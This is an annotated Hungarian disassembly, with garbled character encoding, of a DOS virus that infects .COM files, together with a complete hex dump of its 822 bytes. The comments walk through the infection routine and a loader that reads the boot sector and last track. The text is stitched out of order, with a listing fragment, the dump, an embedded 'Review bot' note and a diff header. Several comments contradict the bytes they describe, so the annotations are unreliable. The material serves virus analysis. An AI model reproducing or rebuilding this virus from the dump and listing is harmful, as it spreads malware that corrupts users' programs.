039A 0E PUSH CS
|
||||
039B 07 POP ES
|
||||
039C 81C3E803 ADD BX,03E8 ;BX=077B
|
||||
03A0 81FBE803 CMP BX,03E8
|
||||
03A4 7303 JNB 03A9
|
||||
03A6 E98200 JMP 042B ;Ha nincs el‚g szabad mem˘ria a szegmensen
|
||||
03A9 53 PUSH BX
|
||||
03AA B80102 MOV AX,0201 ;A:BOOT beolvas sa
|
||||
03AD BA0000 MOV DX,0000
|
||||
03B0 B90100 MOV CX,0001
|
||||
03B3 CD13 INT 13
|
||||
03B5 5B POP BX
|
||||
03B6 7308 JNB 03C0
|
||||
03B8 80FC06 CMP AH,06 ;Ha lemezcsere volt, az nem hiba
|
||||
03BB 74EC JZ 03A9
|
||||
03BD EB6C JMP 042B ;Val˘di hiba->v‚ge
|
||||
03BF 90 NOP
|
||||
03C0 81FE5AA5 CMP SI,A55A
|
||||
03C4 7465 JZ 042B ;V‚ge, ha a T”lt”get” m r a mem˘ri ban van
|
||||
|
||||
;Van-e el‚g szabad mem˘ria a T”lt”get” beolvas s hoz
|
||||
|
||||
03C6 8CC8 MOV AX,CS
|
||||
03C8 050010 ADD AX,1000
|
||||
03CB 53 PUSH BX
|
||||
03CC 50 PUSH AX
|
||||
03CD CD12 INT 12 ;Max mem.
|
||||
03CF BB4000 MOV BX,0040
|
||||
03D2 F7E3 MUL BX ;AX-ben a mem˘ria tetej‚nek szegmense
|
||||
03D4 2D0010 SUB AX,1000 ;legal bb 4Kb kell a T”lt”get”nek
|
||||
03D7 8BD8 MOV BX,AX
|
||||
03D9 58 POP AX ;CS+1000
|
||||
03DA 3BD8 CMP BX,AX
|
||||
03DC 7304 JNB 03E2
|
||||
03DE 5B POP BX
|
||||
03DF EB4A JMP 042B ;V‚ge, ha nincs el‚g szabad mem˘ria
|
||||
03E1 90 NOP
|
||||
|
||||
; A lemez ut˘ls˘ s vj nak megkeres‚se
|
||||
|
||||
03E2 5B POP BX ;BX=077B
|
||||
03E3 8EC0 MOV ES,AX ;Max mem-1000
|
||||
03E5 2E CS:
|
||||
03E6 8B4718 MOV AX,[BX+18] ;S v hossza
|
||||
03E9 2E CS:
|
||||
03EA 8B4F1A MOV CX,[BX+1A] ;Oldalak sz ma
|
||||
03ED F7E1 MUL CX
|
||||
03EF 8BC8 MOV CX,AX ;Egy cilinder nagys ga
|
||||
03F1 2E CS:
|
||||
03F2 8B4713 MOV AX,[BX+13] ;Szektorok sz ma
|
||||
03F5 BA0000 MOV DX,0000
|
||||
03F8 F7F1 DIV CX ;Osztva a cilinder nagys g val AL-ben a s v
|
||||
|
||||
; Az ut˘ls˘ s v beolvas sa
|
||||
|
||||
03FA 81EBE803 SUB BX,03E8 ;BX=0393
|
||||
03FE 53 PUSH BX
|
||||
03FF 8AE8 MOV CH,AL ;40/80-dik s v
|
||||
0401 B101 MOV CL,01
|
||||
0403 BB0001 MOV BX,0100 ;ES:BX-re olvas !
|
||||
0406 BA0000 MOV DX,0000
|
||||
0409 B80802 MOV AX,0208 ;8 szektor beolvas sa
|
||||
040C CD13 INT 13
|
||||
040E 5B POP BX
|
||||
040F 721A JB 042B ;Hib n l v‚ge
|
||||
|
||||
; Ha a T”lt”get”t tal l, elindˇtja
|
||||
|
||||
0411 53 PUSH BX
|
||||
0412 BB0001 MOV BX,0100
|
||||
0415 26 ES:
|
||||
0416 8B07 MOV AX,[BX]
|
||||
0418 3D5224 CMP AX,2452 ;Azonosˇt˘
|
||||
041B 5B POP BX
|
||||
041C 750D JNZ 042B ;Ha nem T”lt”get”
|
||||
041E 8BC3 MOV AX,BX
|
||||
0420 059800 ADD AX,0098 ;AX=042B (A visszat‚r‚sre mutat)
|
||||
0423 0E PUSH CS
|
||||
0424 50 PUSH AX
|
||||
0425 B80A01 MOV AX,010A ;T”lt”get” bel‚p‚si pontja
|
||||
0428 06 PUSH ES
|
||||
0429 50 PUSH AX
|
||||
042A CB RETF
|
||||
|
||||
; Visszat‚r‚s
|
||||
|
||||
042B 5E POP SI ;Regiszterek vissza
|
||||
042C 5F POP DI
|
||||
042D 1F POP DS
|
||||
042E 07 POP ES
|
||||
042F 5A POP DX
|
||||
0430 59 POP CX
|
||||
0431 5B POP BX
|
||||
0432 58 POP AX
|
||||
0433 C3 RET
|
||||
0434 0000 DW 0000 ;???
|
||||
|
||||
|
||||
A vˇrus hexa dumpja :
|
||||
|
||||
|
||||
0100 51 BA F9 02 FC 8B F2 81-C6 0A 00 BF 00 01 B9 03 Q...............
|
||||
0110 00 F3 A4 8B F2 B4 30 CD-21 3C 00 75 03 E9 C7 01 ......0.!<.u....
|
||||
0120 06 B4 2F CD 21 89 9C 00-00 8C 84 02 00 E8 58 02 ../.!.........X.
|
||||
0130 07 BA 5F 00 90 03 D6 B4-1A CD 21 06 56 8E 06 2C .._.......!.V..,
|
||||
0140 00 BF 00 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ....^V..........
|
||||
0150 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 16 00 8B .....u...^......
|
||||
0160 FE 81 C7 1F 00 8B DE 81-C6 1F 00 8B FE EB 3A 83 ..............:.
|
||||
0170 BC 16 00 00 75 03 E9 60-01 1E 56 26 8E 1E 2C 00 ....u..`..V&..,.
|
||||
0180 8B FE 26 8B B5 16 00 81-C7 1F 00 AC 3C 3B 74 0A ..&.........<;t.
|
||||
0190 3C 00 74 03 AA EB F4 BE-00 00 5B 1F 89 B7 16 00 <.t.......[.....
|
||||
01A0 80 7D FF 5C 74 03 B0 5C-AA 89 BF 18 00 8B F3 81 .}.\t..\........
|
||||
01B0 C6 10 00 B9 06 00 F3 A4-8B F3 B4 4E BA 1F 00 90 ...........N....
|
||||
01C0 03 D6 B9 03 00 CD 21 EB-04 B4 4F CD 21 73 02 EB ......!...O.!s..
|
||||
01D0 9E 8B 84 75 00 24 1F 3C-1F 74 EE 81 BC 79 00 00 ...u.$.<.t...y..
|
||||
01E0 FA 77 E6 83 BC 79 00 0A-72 DF 8B BC 18 00 56 81 .w...y..r.....V.
|
||||
01F0 C6 7D 00 AC AA 3C 00 75-FA 5E B8 00 43 BA 1F 00 .}...<.u.^..C...
|
||||
0200 90 03 D6 CD 21 89 8C 08-00 B8 01 43 81 E1 FE FF ....!......C....
|
||||
0210 BA 1F 00 90 03 D6 CD 21-B8 02 3D BA 1F 00 90 03 .......!..=.....
|
||||
0220 D6 CD 21 73 03 E9 A2 00-8B D8 B8 00 57 CD 21 89 ..!s........W.!.
|
||||
0230 8C 04 00 89 94 06 00 B4-2C CD 21 80 E6 07 EB 0D ........,.!.....
|
||||
0240 90 B4 40 B9 05 00 8B D6-81 C2 8A 00 90 B4 3F B9 ..@...........?.
|
||||
0250 03 00 BA 0A 00 90 03 D6-CD 21 72 55 3D 03 00 75 .........!rU=..u
|
||||
0260 50 B8 02 42 B9 00 00 BA-00 00 CD 21 72 43 8B C8 P..B.......!rC..
|
||||
0270 2D 03 00 89 84 0E 00 81-C1 F9 02 8B FE 81 EF F7 -...............
|
||||
0280 01 89 0D B4 40 B9 36 03-8B D6 81 EA F9 01 CD 21 ....@.6........!
|
||||
0290 72 1F 3D 36 03 75 1A B8-00 42 B9 00 00 BA 00 00 r.=6.u...B......
|
||||
02A0 CD 21 72 0D B4 40 B9 03-00 8B D6 81 C2 0D 00 CD .!r..@..........
|
||||
02B0 21 8B 94 06 00 8B 8C 04-00 81 E1 E0 FF 81 C9 1F !...............
|
||||
02C0 00 B8 01 57 CD 21 B4 3E-CD 21 B8 01 43 8B 8C 08 ...W.!.>.!..C...
|
||||
02D0 00 BA 1F 00 90 03 D6 CD-21 1E B4 1A 8B 94 00 00 ........!.......
|
||||
02E0 8E 9C 02 00 CD 21 1F 59-33 C0 33 DB 33 D2 33 F6 .....!.Y3.3.3.3.
|
||||
02F0 BF 00 01 57 33 FF C2 FF-FF 80 00 57 0B 96 01 21 ...W3......W...!
|
||||
0300 00 20 00 E9 00 00 E9 FD-0F 2A 2E 43 4F 4D 00 71 . .......*.COM.q
|
||||
0310 07 21 07 50 41 54 48 3D-54 45 53 5A 54 2E 43 4F .!.PATH=TESZT.CO
|
||||
0320 4D 00 4F 4D 00 20 20 20-20 20 20 20 20 20 20 20 M.OM.
|
||||
0330 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
|
||||
0340 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
|
||||
0350 20 20 20 20 20 20 20 20-03 3F 3F 3F 3F 3F 3F 3F .???????
|
||||
0360 3F 43 4F 4D 03 03 00 4B-09 A1 7D 73 6F 20 96 01 ?COM...K..}so ..
|
||||
0370 21 00 00 10 00 00 54 45-53 5A 54 2E 43 4F 4D 00 !.....TESZT.COM.
|
||||
0380 4F 4D 00 EA F0 FF 00 F0-50 53 51 52 06 1E 57 56 OM......PSQR..WV
|
||||
0390 E8 00 00 5B BE A5 5A BF-AA 55 0E 07 81 C3 E8 03 ...[..Z..U......
|
||||
03A0 81 FB E8 03 73 03 E9 82-00 53 B8 01 02 BA 00 00 ....s....S......
|
||||
03B0 B9 01 00 CD 13 5B 73 08-80 FC 06 74 EC EB 6C 90 .....[s....t..l.
|
||||
03C0 81 FE 5A A5 74 65 8C C8-05 00 10 53 50 CD 12 BB ..Z.te.....SP...
|
||||
03D0 40 00 F7 E3 2D 00 10 8B-D8 58 3B D8 73 04 5B EB @...-....X;.s.[.
|
||||
03E0 4A 90 5B 8E C0 2E 8B 47-18 2E 8B 4F 1A F7 E1 8B J.[....G...O....
|
||||
03F0 C8 2E 8B 47 13 BA 00 00-F7 F1 81 EB E8 03 53 8A ...G..........S.
|
||||
0400 E8 B1 01 BB 00 01 BA 00-00 B8 08 02 CD 13 5B 72 ..............[r
|
||||
0410 1A 53 BB 00 01 26 8B 07-3D 52 24 5B 75 0D 8B C3 .S...&..=R$[u...
|
||||
0420 05 98 00 0E 50 B8 0A 01-06 50 CB 5E 5F 1F 07 5A ....P....P.^_..Z
|
||||
0430 59 5B 58 C3 00 00 Y[X...
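Review bot: Several annotation comments in this listing contradict the bytes beside them, which matters because the commentary is what a reader of an annotated disassembly relies on. At `0292 3D3603 CMP AX,0336` the comment says "648 byteot" while 0336h is 822, the length the header text and the `0285 MOV CX,0336` comment both give; it should read `;Ha nem ˇrta ki mind a 822 byteot`. At `02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D)` the data area declares ERE_TIME at 02FD, so the comment should be `;ERE_TIME (02FD)`. The two size-check comments also mix radixes: `CMP WORD PTR [SI+0079],FA00` is described as "64000h" although FA00h is 64000 decimal, and `CMP WORD PTR [SI+0079],+0A` as "10h byten l" although 0Ah is 10 decimal; writing `64000 (0FA00h)` and `10 (0Ah) byte` would make them consistent with the opcode bytes.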
@ -0,0 +1,669 @@
|
|||
|
||||
|
||||
A Resetel” vˇrus T”lt”get” f‚le mut nsa
|
||||
***************************************
|
||||
|
||||
|
||||
A Resetel” vˇrussal teljes eg‚sz‚ben megegyezik a fert”z” mechanizmus.
|
||||
Eltekintve att˘l, hogy ez a mut ns nem tesz t”nkre f jlokat. Az adatter<65>let is
|
||||
ugyanazon a cˇmen van, ˇgy ugyanŁgy lehet ˇrtani, mint a Resetel”t. A v ltoz s:
|
||||
a vˇrus hossza 822 byte, minden indˇt s ut n az A:-r˘l megpr˘b lja beolvasni a
|
||||
BOOT-ot, majd a 40/80-dik s vot. Ha valamelyik T”lt”get”vel fert”z”tt, akkor
|
||||
elindˇtja a T”lt”get”t !
|
||||
|
||||
|
||||
;Ide (0100-ra) mutat a file elej‚r”l az ugr˘ utasˇt s.
|
||||
|
||||
;Els” feladat: az els” 3 byte visszaˇr sa az eredetire.
|
||||
|
||||
0100 51 PUSH CX ;CX a stacken marad mindv‚gig.
|
||||
;A k”vetkez” utasˇt s operandus t ( jelen esetben 02F9-et )
|
||||
;fert”z‚skor llˇtja be , ˇgy mindig a helyes cˇmre mutat.
|
||||
0101 BAF902 MOV DX,02F9 ;Eredeti els” 3 byte cˇme-10h
|
||||
0104 FC CLD ;( ERE_DTA_OFS)
|
||||
0105 8BF2 MOV SI,DX
|
||||
0107 81C60A00 ADD SI,000A ;SI=offset ERE_KEZD
|
||||
010B BF0001 MOV DI,0100 ;Program eleje
|
||||
010E B90300 MOV CX,0003 ;3 byte
|
||||
0111 F3 REPZ
|
||||
0112 A4 MOVSB ;Az eredeti byteok vissza llˇt sa
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; Install ci˘s r‚sz:
|
||||
;-----------------------------------------
|
||||
|
||||
;DOS verzi˘ lek‚rdez‚se. 1.00-n l kisebb verzi˘n l az eredeti
|
||||
;program futtat sa: ekkor a vˇrus nem m<>k”dik.
|
||||
|
||||
0113 8BF2 MOV SI,DX ;Ezut n SI-ben az adatter<65>let cˇme
|
||||
0115 B430 MOV AH,30
|
||||
0117 CD21 INT 21 ;DOS verzi˘ lek‚rdez‚se
|
||||
0119 3C00 CMP AL,00 ;Csak 1.00-n l kisebbn‚l l‚p ki
|
||||
011B 7503 JNZ 0120
|
||||
011D E9C701 JMP 02E7 ;Eredeti program futtat sa
|
||||
|
||||
|
||||
;Disk Transzfer Address lek‚rdez‚se, elment‚se
|
||||
|
||||
0120 06 PUSH ES
|
||||
0121 B42F MOV AH,2F
|
||||
0123 CD21 INT 21 ;DTA leolvas sa (ES:BX), meg”rz‚se
|
||||
0125 899C0000 MOV [SI+0000],BX ;ERE_DTA_OFS (02F9)
|
||||
0129 8C840200 MOV [SI+0002],ES ;ERE_DTA_SEG (02FB)
|
||||
|
||||
;-------------------------------------------------------
|
||||
; A beiktatott behŁz˘ r‚sz
|
||||
;-------------------------------------------------------
|
||||
|
||||
012D E85802 CALL 0388
|
||||
0130 07 POP ES
|
||||
|
||||
;DTA be llˇt sa ENTRY cˇm‚re (0358). Igy a FindFirst, FindNext
|
||||
;DOS funkci˘k ide fogj k m solni a file adatait (nev‚t,idej‚t,
|
||||
;hossz t,stb).
|
||||
|
||||
0131 BA5F00 MOV DX,005F
|
||||
;{Val˘szˇn<CB87>leg r‚gi assemblerrel ˇrt k a vˇrust, ez‚rt van itt
|
||||
;egy NOP utasˇt s.}
|
||||
0134 90 NOP
|
||||
0135 03D6 ADD DX,SI
|
||||
0137 B41A MOV AH,1A
|
||||
0139 CD21 INT 21 ;DTA llˇt sa DS:DX-re: ENTRY(0358)
|
||||
|
||||
|
||||
;A PATH-ok cˇm‚nek megkeres‚se. Ha az aktu lis k”nyvt rban m r
|
||||
;mindegyik filet megfert”zte , itt taj lja meg azoknak az al-
|
||||
;k”nyvt raknak a nev‚t , amelyekben m‚g megfert”zend” fileokat
|
||||
;tal lhat.
|
||||
|
||||
013B 06 PUSH ES
|
||||
013C 56 PUSH SI
|
||||
013D 8E062C00 MOV ES,[002C];Environment (k”rnyezet) segmense
|
||||
0141 BF0000 MOV DI,0000 ;ES:DI fog a megfelel” helyre
|
||||
;(a k”vetkez” directoryra) mutatni
|
||||
|
||||
|
||||
;A k”vetkez” r‚sz a PATH= sz”veget keresi meg az environment
|
||||
;ter<65>leten:
|
||||
|
||||
0144 5E POP SI
|
||||
0145 56 PUSH SI
|
||||
0146 81C61A00 ADD SI,001A ;STR_PATH (0313)
|
||||
014A AC LODSB ;AL=DS:[SI],SI++
|
||||
014B B90080 MOV CX,8000 ;max 32k az environment
|
||||
014E F2 REPNZ
|
||||
014F AE SCASB ;AL-ES:[DI] Megkeresi a k”vetkez”
|
||||
;'P' bet<65>t
|
||||
0150 B90400 MOV CX,0004 ;M‚g 4 bet<65> azonosˇt sa
|
||||
0153 AC LODSB ;AL=DS:[SI],SI++
|
||||
0154 AE SCASB ;AL-ES:[DI],DI++
|
||||
0155 75ED JNZ 0144 ;Ugr s, ha a k”vetkez” 4 bet<65> nem
|
||||
;egyezik (nem 'ATH=')
|
||||
0157 E2FA LOOP 0153
|
||||
0159 5E POP SI ;ES:DI mutat az els” PATH-ra
|
||||
015A 07 POP ES
|
||||
015B 89BC1600 MOV [SI+0016],DI ;PATH_MUT (030F)
|
||||
|
||||
|
||||
015F 8BFE MOV DI,SI ;{Hogy ez minek ? K‚s”bb Łgyis
|
||||
0161 81C71F00 ADD DI,001F ;fel<65>lˇrja} FILE_PATH (0318)
|
||||
0165 8BDE MOV BX,SI ;Ezut n BX mutat az adatokra
|
||||
0167 81C61F00 ADD SI,001F ;SI is a FILE_PATH-ra(0318) mutat
|
||||
016B 8BFE MOV DI,SI ;{Az el”bb m r be llitotta (?)}
|
||||
016D EB3A JMP 01A9
|
||||
|
||||
|
||||
;A k”vetkez” PATH-ban megadott aldirectoryt FILE_PATH-ra m -
|
||||
;solja. Igy a k”vetkez” fileokat m r ebben az aldirectoryban
|
||||
;fogja keresni.
|
||||
|
||||
016F 83BC160000 CMP WORD PTR [SI+0016],+00 ;PATH_MUT (030F)
|
||||
0174 7503 JNZ 0179
|
||||
0176 E96001 JMP 02D9 ;Ugr s, ha nincs t”bb PATH aldir.
|
||||
;(mindet megfert”te m r)
|
||||
0179 1E PUSH DS
|
||||
017A 56 PUSH SI
|
||||
017B 26 ES:
|
||||
017C 8E1E2C00 MOV DS,[002C] ;Environment segmense
|
||||
0180 8BFE MOV DI,SI ;(02F9)
|
||||
0182 26 ES:
|
||||
0183 8BB51600 MOV SI,[DI+0016] ;PATH_MUT (030F)
|
||||
0187 81C71F00 ADD DI,001F ;FILE_PATH cˇme (0318)
|
||||
018B AC LODSB ;AL=DS:[SI] SI++
|
||||
018C 3C3B CMP AL,3B ;';'
|
||||
018E 740A JZ 019A
|
||||
0190 3C00 CMP AL,00
|
||||
0192 7403 JZ 0197
|
||||
0194 AA STOSB ;ES:[DI]:=AL DI++
|
||||
0195 EBF4 JMP 018B ;Źtm sol s ';' vagy #0-ig
|
||||
|
||||
;#0-val z rult a PATH bejegyz‚s => nem lesz t”bb
|
||||
0197 BE0000 MOV SI,0000
|
||||
019A 5B POP BX ;Ezut n BX mutat az adatokra
|
||||
019B 1F POP DS
|
||||
019C 89B71600 MOV [BX+0016],SI ;PATH_MUT (030F) = 0
|
||||
;( Nincs t”bb PATH jelz‚s )
|
||||
|
||||
;A k”vetkez” PATH-ban adott aldir. m r tm solva.
|
||||
01A0 807DFF5C CMP BYTE PTR [DI-01],5C
|
||||
01A4 7403 JZ 01A6 ;Ugr s, ha az ut˘ls˘ bet<65> a '\'
|
||||
01A6 B05C MOV AL,5C ;Egy‚bk‚nt '\' ˇr s
|
||||
01A8 AA STOSB ;ES:[DI]:=AL DI++
|
||||
|
||||
|
||||
|
||||
|
||||
;Egy aldirectory ki‚rt‚kel‚se . El”sz”r az aktu lis , majd a
|
||||
;FILE_PATH -ra m solt aldirectory v‚gign‚z‚se, fert”z‚s.
|
||||
;DI a FILE_PATH-ba ˇrt aldirectory neve ut ni pozici˘ra mutat.
|
||||
|
||||
|
||||
;A COM kiterjeszt‚s<E2809A> fileok megkeres‚se:
|
||||
|
||||
01A9 89BF1800 MOV [BX+0018],DI ;FILE_NEV_MUT (0311)
|
||||
;Ide kell majd a file nev‚t
|
||||
;m solni (az aldir. neve ut n)
|
||||
01AD 8BF3 MOV SI,BX ;(02F9)
|
||||
01AF 81C61000 ADD SI,0010 ;KERES_STR (0309)
|
||||
01B3 B90600 MOV CX,0006 ;6 bet<65> tm sol sa ('*.COM',0)
|
||||
01B6 F3 REPZ ;A PATH-ban megadott aldirectory
|
||||
01B7 A4 MOVSB ;m”g‚ , ˇgy teljes keres‚si utunk
|
||||
;lesz
|
||||
01B8 8BF3 MOV SI,BX ;(02F9)
|
||||
01BA B44E MOV AH,4E ;FIND FIRST ENTRY
|
||||
01BC BA1F00 MOV DX,001F
|
||||
01BF 90 NOP
|
||||
01C0 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
01C2 B90300 MOV CX,0003 ;HIDDEN, READ ONLY
|
||||
01C5 CD21 INT 21 ;Az els” COM kiterjeszt‚s<E2809A> file
|
||||
;megkeres‚se . A file adatait a DTA
|
||||
; ltal mutatott cˇmre (ENTRY 0358)
|
||||
;m solja.
|
||||
01C7 EB04 JMP 01CD
|
||||
|
||||
|
||||
;K”vetkez” COM file keres‚se (adatai ENTRY-re ker<65>lnek).
|
||||
|
||||
01C9 B44F MOV AH,4F ;FIND NEXT
|
||||
01CB CD21 INT 21
|
||||
01CD 7302 JNB 01D1
|
||||
01CF EB9E JMP 016F ;Ha nem tal l t”bb COM filet : —j
|
||||
;aldirt keres a PATH-ban
|
||||
|
||||
|
||||
;M r tal lt COM filet. Adataival az ENTRY fel van t”ltve.Ennek
|
||||
;a filenak az ellen”rz‚se, fert”z‚se k”vetkezik.
|
||||
|
||||
;Annak ellen”rz‚se , hogy a file megfert”zhet”-e (fert”z”tt-e,
|
||||
;tŁl hosszŁ-e, tŁl r”vid-e) . Ha nem fert”zhet” visszaugrik Łj
|
||||
;fileokat keresni.
|
||||
|
||||
01D1 8B847500 MOV AX,[SI+0075] ;ENT_IDO (036E) A file ideje
|
||||
01D5 241F AND AL,1F
|
||||
01D7 3C1F CMP AL,1F ;Ugr s, ha az als˘ 5 bit 1-es:
|
||||
01D9 74EE JZ 01C9 ;a file m r fert”z”tt.
|
||||
01DB 81BC790000FA CMP WORD PTR [SI+0079],FA00 ;ENT_HOSSZ (0372)
|
||||
01E1 77E6 JA 01C9 ;Ugr s, ha file hossza nagyobb,mint
|
||||
;64000h (m r nem f‚r bele a vˇrus)
|
||||
01E3 83BC79000A CMP WORD PTR [SI+0079],+0A ;ENT_HOSSZ (0372)
|
||||
01E8 72DF JB 01C9 ;Ugr s, ha r”videbb 10h byten l
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; Megvan a kiv laszott file.
|
||||
;-----------------------------------------
|
||||
|
||||
;A file nev‚t az aldirectory neve ut n kell m solni , hogy a
|
||||
;teljes Łt rendelkez‚s<E2809A>nkre lljon , ˇgy majd meg tudja nyitni
|
||||
;a filet.
|
||||
01EA 8BBC1800 MOV DI,[SI+0018] ;FILE_NEV_MUT (0311) Ide fogja
|
||||
01EE 56 PUSH SI ;a file nev‚t m solni
|
||||
01EF 81C67D00 ADD SI,007D ;ENT_NEV (0376)
|
||||
|
||||
01F3 AC LODSB ;AL:=DS:[SI] SI++
|
||||
01F4 AA STOSB ;ES:[DI]:=AL DI++ (M sol s)
|
||||
01F5 3C00 CMP AL,00 ;N‚vlez r˘ 0-ig m sol
|
||||
01F7 75FA JNZ 01F3
|
||||
01F9 5E POP SI ;SI Łjra az adatokra mutat
|
||||
|
||||
|
||||
;A file egyes eredeti inform ci˘inak meg”rz‚se , hogy a fert”-
|
||||
;z‚s ne t<>nj”n fel.
|
||||
|
||||
;Az eredeti attributtum meg”rz‚se:
|
||||
|
||||
;{Fogalmam sincs mi‚rt kell a file attributtum t m‚g egyszer
|
||||
;lek‚rdezni , amikor az ENTRY ter<65>leten megtal lhat˘ . Tal n a
|
||||
;vˇrus ˇr˘ja nem tudta?}
|
||||
01FA B80043 MOV AX,4300 ;File attributtum nak lek‚rdez‚se
|
||||
01FD BA1F00 MOV DX,001F ;FILE_PATH ([SI+1F] 0318)
|
||||
0200 90 NOP ;{piszok}
|
||||
0201 03D6 ADD DX,SI ;DS:DX mutat a file Łtj ra
|
||||
0203 CD21 INT 21 ;CX-ben az attributtum
|
||||
0205 898C0800 MOV [SI+0008],CX ;ERE_ATTR (0301)
|
||||
|
||||
|
||||
;A file ˇr sv‚delm‚nek t”rl‚se:
|
||||
|
||||
0209 B80143 MOV AX,4301 ;File attributtum nak llit sa
|
||||
020C 81E1FEFF AND CX,FFFE ;Read Only jelz‚s t”rl‚se
|
||||
0210 BA1F00 MOV DX,001F ;{ Az el”bb m r be llˇtotta, minek
|
||||
0213 90 NOP ;Łjra? }
|
||||
0214 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
0216 CD21 INT 21
|
||||
|
||||
|
||||
;File megnyit sa:
|
||||
|
||||
0218 B8023D MOV AX,3D02 ;File megnyit sa ˇr sra, olvas sra
|
||||
021B BA1F00 MOV DX,001F ;{M‚g egyszer be llˇtja!}
|
||||
021E 90 NOP ;{piszok}
|
||||
021F 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
0221 CD21 INT 21
|
||||
0223 7303 JNB 0228
|
||||
0225 E9A200 JMP 02CA ;Hib n l: nincs fert”z‚s
|
||||
0228 8BD8 MOV BX,AX ;Handle
|
||||
|
||||
|
||||
;A file eredeti (mostani) idej‚nek lek‚rdez‚se:
|
||||
|
||||
;{Ez is megtal lhat˘ lenne az ENTRY ter<65>leten!}
|
||||
022A B80057 MOV AX,5700 ;Get Date & Time
|
||||
022D CD21 INT 21
|
||||
022F 898C0400 MOV [SI+0004],CX ;ERE_TIME (02FD)
|
||||
0233 89940600 MOV [SI+0006],DX ;ERE_DATE (02FF)
|
||||
|
||||
|
||||
;Annak eld”nt‚se , hogy a kiv lasztott filet t”nkretegye-e ,
|
||||
;vagy megfert”zze . Lek‚rdezi a jelenlegi id”t , ‚s ha m sod-
|
||||
;perceinek sz ma 8-cal oszthat˘ , akkor a filet resetel”v‚ te-
|
||||
;szi, egy‚bk‚nt pedig megfert”zi. Igy az esetek 2/15-”d r‚sz‚-
|
||||
;ben teszi csak t”nkre a filet.
|
||||
|
||||
0237 B42C MOV AH,2C ;A mostani id” lek‚rdez‚se
|
||||
0239 CD21 INT 21
|
||||
023B 80E607 AND DH,07 ;A m sodpercek als˘ 3 bitje
|
||||
023E EB0D JMP 024D ;Fert”z‚s
|
||||
0240 90 NOP
|
||||
|
||||
|
||||
; Szem‚t a Reselet”lb”l
|
||||
|
||||
0241 B440 MOV AH,40
|
||||
0243 B90500 MOV CX,0005
|
||||
0246 8BD6 MOV DX,SI
|
||||
0248 81C28A00 ADD DX,008A
|
||||
024C 90 NOP
|
||||
|
||||
;-----------------------------------------
|
||||
; Fert”z‚s:
|
||||
;-----------------------------------------
|
||||
|
||||
|
||||
;Az eredeti file els” 3 bytej nak meg”rz‚se , hogy k‚s”bb m‚g
|
||||
;futtatni lehessen.
|
||||
024D B43F MOV AH,3F ;Olvas s fileb˘l
|
||||
024F B90300 MOV CX,0003 ;Az els” 3 byte beolvas sa
|
||||
0252 BA0A00 MOV DX,000A
|
||||
0255 90 NOP ;{piszok}
|
||||
0256 03D6 ADD DX,SI ;ERE_KEZD (0303)
|
||||
0258 CD21 INT 21
|
||||
025A 7255 JB 02B1 ;Hib n l v‚ge
|
||||
025C 3D0300 CMP AX,0003
|
||||
025F 7550 JNZ 02B1 ;Hib n l v‚ge
|
||||
|
||||
|
||||
;File v‚g‚re ll s, az Łj cˇmek kisz mˇt sa:
|
||||
|
||||
0261 B80242 MOV AX,4202 ;File Pointer file v‚g‚re llˇt sa
|
||||
0264 B90000 MOV CX,0000
|
||||
0267 BA0000 MOV DX,0000
|
||||
026A CD21 INT 21
|
||||
026C 7243 JB 02B1 ;{Itt nem nagyon lehet hiba!}
|
||||
|
||||
|
||||
;A file elej‚re irand˘ JMP operandus nak kisz mˇt sa:
|
||||
|
||||
026E 8BC8 MOV CX,AX ;AX-ben a file hossza
|
||||
0270 2D0300 SUB AX,0003 ;AX-ben az eltol s a JMP utasˇt s-
|
||||
;hoz, ahhoz amit a file elej‚re fog
|
||||
;majd ˇrni . Igy ez a JMP a file
|
||||
;mostani v‚ge ut ni bytera fog mu-
|
||||
;tatni.
|
||||
0273 89840E00 MOV [SI+000E],AX ;CIM_JMP (0307)
|
||||
|
||||
|
||||
;Az Łj fileon bel<65>li adatter<65>let cˇm‚nek kisz mˇt sa ‚s be l-
|
||||
;lˇt sa:
|
||||
|
||||
0277 81C1F902 ADD CX,02F9 ;CX az Łj fileon bel<65>li adatter<65>-
|
||||
027B 8BFE MOV DI,SI ;letre mutat.
|
||||
027D 81EFF701 SUB DI,01F7 ;A vˇrus els” utasˇt s nak (MOV DX,
|
||||
;02F9) operandus nak cˇme.
|
||||
0281 890D MOV [DI],CX ;Ide ˇrja az adatter<65>let cˇm‚t
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; A vˇrus hozz m solja mag t a filehoz:
|
||||
;-----------------------------------------
|
||||
|
||||
;(A filemutat˘ a file v‚g‚re mutat.)
|
||||
0283 B440 MOV AH,40 ;Ir s fileba.
|
||||
0285 B93603 MOV CX,0336 ;822 byte (a vˇrus hossza)
|
||||
0288 8BD6 MOV DX,SI
|
||||
028A 81EAF901 SUB DX,01F9 ;DX a vˇrus els” bytej ra mutat
|
||||
028E CD21 INT 21
|
||||
0290 721F JB 02B1 ;Hib n l v‚ge
|
||||
0292 3D3603 CMP AX,0336
|
||||
0295 751A JNZ 02B1 ;Ha nem ˇrta ki mind a 648 byteot
|
||||
|
||||
|
||||
;Az els” 3 byte t llˇt sa, egy a file v‚g‚re mutat˘ ugr˘ uta-
|
||||
;sˇt sra:
|
||||
|
||||
0297 B80042 MOV AX,4200 ;A file pointer a file elej‚re!
|
||||
029A B90000 MOV CX,0000
|
||||
029D BA0000 MOV DX,0000
|
||||
02A0 CD21 INT 21
|
||||
02A2 720D JB 02B1 ;{Itt sem lehet hiba!}
|
||||
|
||||
02A4 B440 MOV AH,40 ;Ir s fileba
|
||||
02A6 B90300 MOV CX,0003 ;3 byte
|
||||
02A9 8BD6 MOV DX,SI
|
||||
02AB 81C20D00 ADD DX,000D ;B_JMP (0306) DX az ugr˘ utasˇt sra
|
||||
02AF CD21 INT 21 ;mutat
|
||||
|
||||
|
||||
;Az eredeti id” ( m r a fert”z‚sjelz‚ssel egy<67>tt ) vissza llˇ-
|
||||
;t sa:
|
||||
|
||||
02B1 8B940600 MOV DX,[SI+0006] ;ERE_DATE (02FF)
|
||||
